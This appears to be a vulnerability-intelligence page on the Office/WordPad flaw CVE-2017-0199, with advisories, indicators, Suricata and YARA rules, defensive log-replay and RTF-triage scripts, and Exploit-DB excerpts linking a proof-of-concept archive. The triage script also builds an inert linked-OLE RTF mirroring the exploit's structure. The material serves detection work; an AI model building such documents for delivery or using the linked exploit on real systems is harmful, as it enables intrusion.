CVE-2017-0199
Published 2017-04-12
CVE-2017-0199: Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2…
Priority P1 · 95 · high · CVSS 3.1 base score 7.8 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Tags: KEV · ITW · Exploit · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 99.93% (100.0th percentile)
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."
Affected
18 affected ranges reported (version bounds not populated in this record)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office | — | — |
| microsoft | windows_server_2008 | — | — |
| microsoft_corporation | office_wordpad | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
| msrc | windows_vista_service_pack_2 | — | — |
| msrc | windows_vista_x64_edition_service_pack_2 | — | — |
| philips | intellispace_portal | — | — |
Detection & IOCs (extracted from the cited sources)
- CVE-2017-0199 exploitation begins with an OLE-format Excel/Office document containing an embedded OLE link object that is refreshed automatically on open to download a remote RTF document; detect documents whose embedded OLE links auto-update on open.
- The RTF exploit uses the \objupdate control word to force the embedded OLE object to execute before display, without requiring user interaction with the object. Scan RTF files for \objupdate combined with Equation Editor OLE objects.
- The embedded OLE object class name in malicious RTF files exploiting CVE-2017-11882 (chained after CVE-2017-0199) is 'EQuATioN.3', a case-mangled 'Equation.3'; use rtfdump/rtfobj to extract and inspect OLE class names in RTF documents.
- Agent Tesla anti-analysis checks include: CheckRemoteDebuggerPresent(), a tick-count delta after a 10 ms sleep, presence of SbieDLL.dll/SxIn.dll/Sf2.dll/snxhk.dll/cmdvrt32.dll, WMI queries for 'Manufacturer'/'Model'/'Name' of the video controller matching VMware/VirtualBox/VBox/VIRTUAL, and an HTTP GET to ip-api.com/line/?fields=hosting.
- Process hollowing is performed into AddInProcess32 (launched with CREATE_SUSPENDED as part of creation flags 0x80000004); monitor for AddInProcess32.exe being spawned by PowerShell or unusual parent processes, especially with suspended creation flags.
- A malicious Word document exploiting CVE-2017-0199 was observed in the RedAlpha campaign targeting Tibetan communities; the sample was first seen in the wild during the 57-day CNNVD publication lag window.
- The Agent Tesla loader module is fileless: it is loaded directly into PowerShell memory and never written to disk, so file-based detection is ineffective for this stage.
- The malicious RTF file exploiting CVE-2017-0199/CVE-2017-11882 was heavily obfuscated with random MTEF header field values (except the MTEF version field, which must be 2 or 3), causing near-zero AV detection at the time of analysis.
- The JavaScript downloader (morningdatingroses.js) uses a reversed URL string reassembled at runtime via .split('').reverse().join(''), evading static string-based detection of the C2 URL.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 9.3 | HIGH | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 7.8 | HIGH | — |
| vendor_msrc | — | 6.7 | MEDIUM | — |
CISA
Microsoft Office and WordPad Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 7.8
Affected: Microsoft Office and WordPad
Microsoft Office and WordPad contain an unspecified vulnerability due to the way the applications parse specially crafted files. Successful exploitation allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-0199
Remediation Due Date: 2022-05-03
Microsoft
Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows
vendor_msrc·2017-04-11·CVSS 6.7
Description: A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
Exploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.
The update addresses the vulnerability by correcting th
GHSA
GHSA-mrf9-75pc-cjmm: Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 20
ghsa_unreviewed·2022-05-13
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."
VulnCheck
Microsoft Office and WordPad Remote Code Execution Vulnerability
vulncheck·2017·CVSS 7.8
Microsoft Office and WordPad contain an unspecified vulnerability due to the way the applications parse specially crafted files. Successful exploitation allows for remote code execution.
Affected: Microsoft Office and WordPad
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability; https://www.malware-traffic-analysis.net/2017/04/27/index.html; https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts; https://blog.checkpoint.com/research/brokers-shadows-analyzing-v
VulnCheck
Adobe Flash Player Arbitrary Code Execution Vulnerability
vulncheck·2016·CVSS 9.8
CVE-2016-4117 [CRITICAL] Adobe Flash Player Arbitrary Code Execution Vulnerability
An access of resource using incompatible type vulnerability exists within Adobe Flash Player that allows an attacker to perform remote code execution.
Affected: Adobe Flash Player
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.cve.org/CVERecord?id=CVE-2016-4117; https://security.berkeley.edu/news/vulnerable-adobe-flash-player-allows-remote-code-execution-cve-2016-4117; https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/; https://securelist.com/operation-daybreak/75100/; https://ww
VulnCheck
Microsoft Office Memory Corruption Vulnerability
vulncheck·2015·CVSS 7.8
CVE-2015-1641 [HIGH] CWE-399 Microsoft Office Memory Corruption Vulnerability
Microsoft Office contains a memory corruption vulnerability due to failure to properly handle rich text format files in memory. Successful exploitation allows for remote code execution in the context of the current user.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.sekoia.fr/blog/ms-office-exploit-analysis-cve-2015-1641/; https://unit42.paloaltonetworks.com/unit42-new-sofacy-attacks-against-us-government-agency/; https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=09308982
VulnCheck
Microsoft Office Malformed EPS File Vulnerability
vulncheck·2015·CVSS 7.8
CVE-2015-2545 [HIGH] CWE-20 Microsoft Office Malformed EPS File Vulnerability
Microsoft Office allows remote attackers to execute arbitrary code via a crafted EPS image.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html; http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf; https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/; https://securelist.com/cve-2015-2545-overview-of-current-threats/74828/; https://www.proofpoi
VulnCheck
Microsoft Office Buffer Overflow Vulnerability
vulncheck·2013·CVSS 7.8
CVE-2013-1331 [HIGH] CWE-119 Microsoft Office Buffer Overflow Vulnerability
Microsoft Office contains a buffer overflow vulnerability that allows remote attackers to execute code via crafted PNG data in an Office document.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf; https://dl.acm.org/doi/pdf/10.1145/3465481.3465758; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortinet.com/blog/threat-research/an-inside-look-at-cve-2017-0199-hta-and-scriptlet-file-handler-vulnerability
Remediation Due: 2022-06-22
VulnCheck
Microsoft MSCOMCTL.OCX Remote Code Execution Vulnerability
vulncheck·2012·CVSS 8.8
CVE-2012-0158 [HIGH] CWE-94 Microsoft MSCOMCTL.OCX Remote Code Execution Vulnerability
Microsoft MSCOMCTL.OCX contains an unspecified vulnerability that allows for remote code execution, allowing an attacker to take complete control of an affected system under the context of the current user.
Affected: Microsoft MSCOMCTL.OCX
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://web.archive.org/web/20120907091804/http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf; https://www.cve.org/CVERecord?id=CVE-2012-0158; https://cybersecurity.att.com/blogs/labs-research/msupdater-trojan-found-using-cve-2012-0158-space-and-missile-defense-conference; https://securelist.com/red-october-diplomati
Suricata
ET MALWARE HTTP Andromeda File Request
suricata·2017-07-21
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE HTTP Andromeda File Request"; flow:established,to_server; http.uri; content:"myguy"; fast_pattern; pcre:"/myguy\.(?:xls(?:\.hta)?|exe)$/"; reference:url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference:cve,2017-0199; classtype:trojan-activity; sid:2024490; rev:5; metadata:created_at 2017_07_21, cve CVE_2017_0199, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_09;)
Suricata
ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
suricata·2017-07-07·CVSS 7.8
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl"; flow:established,to_server; http.uri; content:".hta"; nocase; fast_pattern; pcre:"/\.hta(?:[?&]|$)/i"; http.user_agent; content:"Mozilla/4.0 (compatible|3b 20|MSIE 7.0|3b|"; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"cookie|0d 0a|"; reference:md5,66a42e338e32fb6c02c9d4c56760d89d; classtype:attempted-user; sid:2024449; rev:7; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_07_07, cve CVE_2017_0199, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV
Suricata
ET EXPLOIT Suspicious FTP RETR to .hta file possible exploit (CVE-2017-0199)
suricata·2017-06-29·CVSS 7.8
Rule: alert tcp $HOME_NET any -> $EXTERNAL_NET 21 (msg:"ET EXPLOIT Suspicious FTP RETR to .hta file possible exploit (CVE-2017-0199)"; flow:established,to_server; content:"|2e|hta|0d 0a|"; nocase; fast_pattern; content:"RETR "; pcre:"/^[^\r\n]+\.hta\r?\n/Ri"; classtype:bad-unknown; sid:2024434; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product MS_Office, attack_target Client_Endpoint, created_at 2017_06_29, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag possible_exploitation, tag CISA_KEV, updated_at 2019_10_08;)
Suricata
ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL
suricata·2017-06-19·CVSS 7.8
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL"; flow:established,to_client; file.data; content:"|7b 5c 72 74|"; within:4; content:!"|66|"; within:1; content:"|5C 6F 62 6A 61 75 74 6C 69 6E 6B|"; nocase; distance:0; reference:md5,8168b2305289ecc778216405d1fd7984; reference:cve,2017-0199; classtype:trojan-activity; sid:2024413; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_06_19, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_14;)
Suricata
ET WEB_CLIENT Office Requesting .HTA File Likely CVE-2017-0199 Request
suricata·2017-04-19·CVSS 7.8
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_CLIENT Office Requesting .HTA File Likely CVE-2017-0199 Request"; flow:established,to_server; http.uri; content:".hta"; nocase; fast_pattern; http.user_agent; content:"Microsoft Office"; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:cve,2017-0199; classtype:trojan-activity; sid:2024224; rev:5; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2017_04_19, cve CVE_2017_0199, deployment Perimeter, malware_family Exploit_Kit_RIG, performance_impact Low, confidence Medium, signature_severity Major, tag Exploit_kit_RIG, ta
Suricata
ET WEB_CLIENT Office UA FB SET
suricata·2017-04-19
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_CLIENT Office UA FB SET"; flow:established,to_server; flowbits:set,Office.UA; flowbits:noalert; http.user_agent; content:"Microsoft Office"; fast_pattern; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:cve,cve-2017-0199; classtype:trojan-activity; sid:2024225; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2017_04_19, deployment Perimeter, malware_family Exploit_Kit_RIG, performance_impact Low, signature_severity Major, tag Exploit_kit_RIG, updated_at 2024_04_20;)
Suricata
ET WEB_CLIENT Office Discovery HTA file Likely CVE-2017-0199 Request M2
suricata·2017-04-19·CVSS 7.8
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Office Discovery HTA file Likely CVE-2017-0199 Request M2"; flow:established,to_client; flowbits:isset,Office.UA; http.content_type; content:"application/hta"; nocase; endswith; fast_pattern; reference:cve,cve-2017-0199; classtype:trojan-activity; sid:2024226; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2017_04_19, deployment Perimeter, malware_family Exploit_Kit_RIG, performance_impact Low, confidence Medium, signature_severity Major, tag Exploit_kit_RIG, tag CISA_KEV, updated_at 2020_10_09;)
Suricata
ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
suricata·2017-04-11·CVSS 7.8
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)"; flow:established,to_client; flowbits:isset,et.IE7.NoRef.NoCookie; http.content_type; bsize:15; content:"application/hta"; fast_pattern; nocase; classtype:trojan-activity; sid:2024197; rev:8; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_04_11, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, signature_severity Major, tag CISA_KEV, updated_at 2024_03_27;)
Suricata
ET EXPLOIT Possible CVE-2017-0199 HTA Inbound
suricata·2017-04-10·CVSS 7.8
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2017-0199 HTA Inbound"; flow:established,to_client; flowbits:isset,et.IE7.NoRef.NoCookie; http.content_type; bsize:15; content:"application/hta"; fast_pattern; file.data; content:"|7b 5c 72 74|"; distance:1; content:"|7b 5c|"; distance:0; content:"|7b 5c|"; distance:0; classtype:trojan-activity; sid:2024192; rev:6; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product MS_Office, attack_target Client_Endpoint, created_at 2017_04_10, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_27;)
Suricata
ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
suricata·2017-04-10·CVSS 7.8
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199"; flow:established,to_client; flowbits:isset,et.http.hta; file.data; content:"Wscript.Shell"; nocase; reference:url,www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html; reference:url,securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/; classtype:attempted-user; sid:2024196; rev:4; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_04_10, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, signature_severity Major, tag CISA_KEV, updated_at 2024_04_0
Suricata
ET EXPLOIT Possible CVE-2017-0199 HTA Inbound M2
suricata·2017-04-10·CVSS 7.8
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2017-0199 HTA Inbound M2"; flow:established,to_client; http.content_type; bsize:15; content:"application/hta"; file.data; content:"|2e 65 78 70 61 6e 64 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 28 22 25 41 50 50 44 41 54 41 25 22 29 20|"; fast_pattern; content:"|4d 65 6e 75 5c 50 72 6f 67 72 61 6d 73 5c 53 74 61 72 74 75 70 5c|"; classtype:trojan-activity; sid:2024193; rev:6; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product MS_Office, attack_target Client_Endpoint, created_at 2017_04_10, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, up
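The Suricata signatures above all key on the same shape: an Office or IE7-style client fetching an .hta resource, or receiving an application/hta response, with no Referer (and for the IE7 variant no Cookie) in the request. The following script is an added example, not Emerging Threats code: it re-expresses the matching conditions of sids 2024224, 2024225/2024226 and 2024449 as functions that can be run after the fact over proxy or Zeek-style HTTP logs, which is what a responder has when the IDS was not in path. The log format (one JSON object per line with the fields used below) and every record in SAMPLE_LOG are constructed for this example; 192.0.2.x and 198.51.100.x are documentation address ranges.

```python
"""Replay the ET CVE-2017-0199 HTA-download conditions over HTTP logs (added example)."""
import json
import re
from typing import Dict, List

# pcre from sid 2024449: ".hta" must end the path or be followed by ? or &
HTA_URI = re.compile(r"\.hta(?:[?&]|$)", re.IGNORECASE)
# http.user_agent; startswith prefixes from sids 2024224/2024225 and 2024449
OFFICE_UA_PREFIX = "Microsoft Office"
IE7_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 7.0;"

# Constructed JSON-lines HTTP log: one transaction per line, request and response joined.
SAMPLE_LOG = r"""
{"ts":"2017-04-12T09:14:02Z","src":"10.0.0.21","dst":"198.51.100.7","method":"GET","uri":"/templates/invoice.hta","user_agent":"Microsoft Office Word 2013","req_headers":["Host","Accept","User-Agent","Connection"],"status":200,"resp_content_type":"application/hta"}
{"ts":"2017-04-12T09:14:03Z","src":"10.0.0.21","dst":"198.51.100.7","method":"GET","uri":"/templates/style.css","user_agent":"Microsoft Office Word 2013","req_headers":["Host","Accept","User-Agent"],"status":200,"resp_content_type":"text/css"}
{"ts":"2017-04-12T09:15:40Z","src":"10.0.0.33","dst":"192.0.2.55","method":"GET","uri":"/f/update.hta?id=7","user_agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727)","req_headers":["Host","Accept","User-Agent","Connection"],"status":200,"resp_content_type":"application/hta"}
{"ts":"2017-04-12T09:16:01Z","src":"10.0.0.40","dst":"192.0.2.55","method":"GET","uri":"/help/intro.hta?v=2","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/57.0","req_headers":["Host","Accept","User-Agent","Referer","Cookie"],"status":200,"resp_content_type":"application/hta"}
{"ts":"2017-04-12T09:16:30Z","src":"10.0.0.21","dst":"198.51.100.9","method":"GET","uri":"/site/.htaccess","user_agent":"Microsoft Office Word 2013","req_headers":["Host","Accept","User-Agent"],"status":403,"resp_content_type":"text/html"}
"""


def classify(rec: Dict) -> List[str]:
    """Return the names of the ET-style conditions one HTTP transaction satisfies."""
    ua = rec.get("user_agent", "")
    uri = rec.get("uri", "")
    ctype = rec.get("resp_content_type", "").lower()
    sent = {h.lower() for h in rec.get("req_headers", [])}
    no_referer = "referer" not in sent
    no_cookie = "cookie" not in sent
    hits = []
    if ua.startswith(OFFICE_UA_PREFIX) and no_referer:
        if HTA_URI.search(uri):
            hits.append("office_ua_hta_uri")            # sid 2024224
        if ctype.endswith("application/hta"):
            hits.append("office_ua_hta_response")       # sids 2024225 + 2024226 (flowbit pair)
    if ua.startswith(IE7_UA_PREFIX) and no_referer and no_cookie and HTA_URI.search(uri):
        hits.append("ie7_noref_nocookie_hta")           # sid 2024449
    return hits


def scan(log_text: str) -> List[Dict]:
    """Parse JSON-lines HTTP log text and return only the transactions that matched."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        hits = classify(rec)
        if hits:
            findings.append({"ts": rec["ts"], "src": rec["src"], "dst": rec["dst"],
                             "uri": rec["uri"], "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["src"], "->", f["dst"], f["uri"], ",".join(f["hits"]))
```

Two records in the constructed log should match: the Office client pulling invoice.hta (both Office conditions fire, since the request URI and the response type each match) and the IE7-style fetch of update.hta with no Referer or Cookie. The Chrome request for a legitimate .hta is excluded by its Referer and Cookie headers, and the .htaccess probe shows why the anchored pcre from sid 2024449 is preferable to a bare ".hta" substring.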
YARA
rtf_objdata_urlmoniker_http
yara
rule rtf_objdata_urlmoniker_http {
    meta:
        ref = "https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/"
    strings:
        $header = "{\\rtf1"
        // OLE 1.0 object header (version 0x501, FormatID 2) directly after \objdata
        $objdata = "objdata 0105000002000000" nocase
        // URL Moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} in on-disk byte order
        $urlmoniker = "E0C9EA79F9BACE118C8200AA004BA90B" nocase
        // "http://" as UTF-16LE, hex-encoded
        $http = "68007400740070003a002f002f00" nocase
    condition:
        $header at 0 and $objdata and $urlmoniker and $http
}
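The YARA rule above and the \objupdate / \objautlink indicators in the Detection & IOCs list describe the same artefact from two angles: a linked OLE object whose moniker is a URL, in an RTF that tells Word to refresh the link on open. The script below is an added example, not code from the page, NVISO or any vendor. It applies the rule's four string conditions to the raw text, and separately decodes the \objdata hex so the OLE class name and the embedded URL can be reported rather than just matched. build_sample_rtf() constructs the test document here; it embeds only the OLE 1.0 header and the moniker portion of a linked object, not a full compound file, which is enough for the parser and keeps the sample inert.

```python
"""Triage an RTF sample for the CVE-2017-0199 OLE2Link + URL-moniker shape (added example)."""
import re
import struct
from typing import Dict, List, Optional, Set

# On-disk byte order of {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, the URL Moniker CLSID
URL_MONIKER_CLSID = bytes.fromhex("E0C9EA79F9BACE118C8200AA004BA90B")
# OLE 1.0 object header: version 0x00000501, FormatID 2, as in the YARA rule's $objdata
OLE10_HEADER = bytes.fromhex("0105000002000000")
# Control words that make Word refresh the link on open without a click on the object
AUTO_CONTROL_WORDS = ("objautlink", "objupdate")


def control_words(rtf: str) -> Set[str]:
    """Every RTF control word present (names only, parameters dropped)."""
    return set(re.findall(r"\\([a-zA-Z]+)", rtf))


def objdata_blobs(rtf: str) -> List[bytes]:
    """Decode each \\objdata hex group to bytes, ignoring the line wrapping RTF writers add."""
    blobs = []
    for m in re.finditer(r"\\objdata\b([^{}]*)", rtf):
        hexdata = re.sub(r"[^0-9A-Fa-f]", "", m.group(1))
        if hexdata and len(hexdata) % 2 == 0:
            blobs.append(bytes.fromhex(hexdata))
    return blobs


def ole_class_name(blob: bytes) -> Optional[str]:
    """Class name from the OLE 1.0 header: u32 length, then NUL-terminated ASCII."""
    if not blob.startswith(OLE10_HEADER) or len(blob) < 12:
        return None
    (n,) = struct.unpack_from("<I", blob, 8)
    return blob[12:12 + n].rstrip(b"\x00").decode("ascii", errors="replace")


def moniker_urls(blob: bytes) -> List[str]:
    """URL(s) serialised after a URL Moniker CLSID: u32 byte count, then UTF-16LE, NUL-terminated."""
    urls, pos = [], 0
    while True:
        idx = blob.find(URL_MONIKER_CLSID, pos)
        if idx == -1:
            break
        start = idx + len(URL_MONIKER_CLSID)
        if start + 4 > len(blob):
            break
        (cb,) = struct.unpack_from("<I", blob, start)
        text = blob[start + 4:start + 4 + cb].decode("utf-16-le", errors="replace")
        urls.append(text.split("\x00", 1)[0])
        pos = start + 4 + cb
    return urls


def yara_rule_would_match(rtf: str) -> bool:
    """The four strings of rtf_objdata_urlmoniker_http, tested on the raw text as YARA would."""
    low = rtf.lower()
    return (rtf.startswith("{\\rtf1")
            and "objdata 0105000002000000" in low
            and URL_MONIKER_CLSID.hex() in low
            and "http://".encode("utf-16-le").hex() in low)


def triage_rtf(rtf: str) -> Dict:
    """Summarise what a responder wants from an RTF sample in one dict."""
    words = control_words(rtf)
    declared = re.search(r"\\objclass\s+([^{}\\]+)", rtf)
    objects = [{"class_name": ole_class_name(b), "urls": moniker_urls(b)} for b in objdata_blobs(rtf)]
    auto = sorted(w for w in AUTO_CONTROL_WORDS if w in words)
    is_rtf = rtf.startswith("{\\rtf1")
    return {
        "is_rtf": is_rtf,
        "auto_update_words": auto,
        # Samples often declare a harmless Word class while the OLE data is really OLE2Link
        "declared_objclass": declared.group(1).strip() if declared else None,
        "objects": objects,
        # A remote link Word will refresh on open: the CVE-2017-0199 delivery shape
        "suspicious": is_rtf and bool(auto) and any(o["urls"] for o in objects),
    }


def build_sample_rtf(url: str, wrap: int = 64) -> str:
    """Constructed, inert sample: a linked OLE2Link object whose URL moniker points at `url`.
    `wrap` reproduces the fixed-width hex lines RTF writers emit; 0 keeps the hex on one line."""
    url_utf16 = url.encode("utf-16-le") + b"\x00\x00"
    moniker = URL_MONIKER_CLSID + struct.pack("<I", len(url_utf16)) + url_utf16
    class_name = b"OLE2Link\x00"
    blob = (OLE10_HEADER
            + struct.pack("<I", len(class_name)) + class_name
            + struct.pack("<II", 0, 0)                      # empty topic and item names
            + struct.pack("<I", len(moniker)) + moniker)
    hexdata = blob.hex()
    if wrap:
        hexdata = "\n".join(hexdata[i:i + wrap] for i in range(0, len(hexdata), wrap))
    return ("{\\rtf1\\ansi\\deff0\n"
            "{\\object\\objautlink\\objupdate\\objw9027\\objh5000"
            "{\\*\\objclass Word.Document.8}"
            "{\\*\\objdata " + hexdata + "}}\n"
            "\\par Please see the attached document.\\par\n}")


if __name__ == "__main__":
    sample = build_sample_rtf("http://192.0.2.10/template.doc")  # TEST-NET-2 address
    print(triage_rtf(sample))
    print("yara text match:", yara_rule_would_match(sample))
```

On the constructed sample the decoder reports class OLE2Link, the declared \objclass Word.Document.8, both auto-update control words and the URL, and flags it. The YARA text match, by contrast, fails on the same sample when the hex is wrapped at 64 columns, because the line break lands inside the UTF-16LE "http://" run; with wrap=0 it matches. That is the practical caveat with hex-string rules over RTF: normalise or decode the \objdata group before matching, or accept misses whenever the writer's line width splits the string.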
Exploit-DB
Microsoft Office - 'Composite Moniker' Remote Code Execution
exploitdb·2018-01-09·CVSS 7.8
CVE-2017-8570 [HIGH] Microsoft Office - 'Composite Moniker' Remote Code Execution
---
## What?
This repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the "Composite Moniker" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides.
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44263.zip
## Why?
A few reasons.
1. I wanted to see if it was possible to use the [Packager.dll file-dropping trick](https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/) to exploit this vulnerability.
2. As far as I'm aware, all other public exploits for CVE-2017-8570 are actually exploiting the "Scrip
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
